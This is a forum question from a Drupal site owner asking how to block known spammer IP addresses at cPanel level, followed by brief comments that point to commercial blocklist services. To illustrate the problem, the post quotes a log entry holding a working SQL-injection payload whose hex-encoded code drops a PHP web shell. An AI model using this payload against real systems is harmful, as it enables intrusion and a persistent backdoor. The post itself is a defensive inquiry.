# cPanel deny IP Addresses of spammers

Tags: blacklist

I have a drupal 7 site, but this question is a more generic one. In the logs I'm seeing regular "attacks" to access protected resources. So attackers are just trying. I'm starting to see more sophisticated attacks such as :

```
example.com/user.php?act=login
```

and with a referrer:

```
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
```

When I'm checking the ip addresses of these attacks 98% they are already registered as spam in the stopforumspam database.

Is there a way to have a list or an api at cPanel level not to have to have to deny each ip address manually.

My question is about cPanel not drupal, since I believe it is better to block them at a higher level even before reaching drupal.

In drupal I have a stopforumspam module but this is used to deny registration, which does not prevent attacks such as the one above.

What I need is to be able to block these attacks from known spammer Ips without having to add each ip address manualy in the deny Ip address list in cPanel.

Many thanks

Comment: You have commercial services that offers that functionality, just google a bit and you will find them

Comment: Thank you, I spent some time in googling cPanel blaklist ip, cPanel spam blaklist, stopforumspam blaklist, I can't find much. Should this service come from my own hosting provider? In my case that is siteground. I guess it must come from them, otherwise in cPanel I can add ip address only manually one by one. If you could share with me at least some keywords to know what to search for I would appreciate it.

Comment: Probably your host provider have some service, but I will recomend you to be agnostic of your ISP and find whats better for you in terms of service, price, detection, and so on.

Comment: I agree to be ISP agnostic. Mine does not have any public services, I could ask. In any case, can you help me with some keywords to search on google, (assuming that you cannot post straight away the name of the company) to find such a paid service, because I can't find any so far, and I wonder how would they integrate with my cPanel afterwards...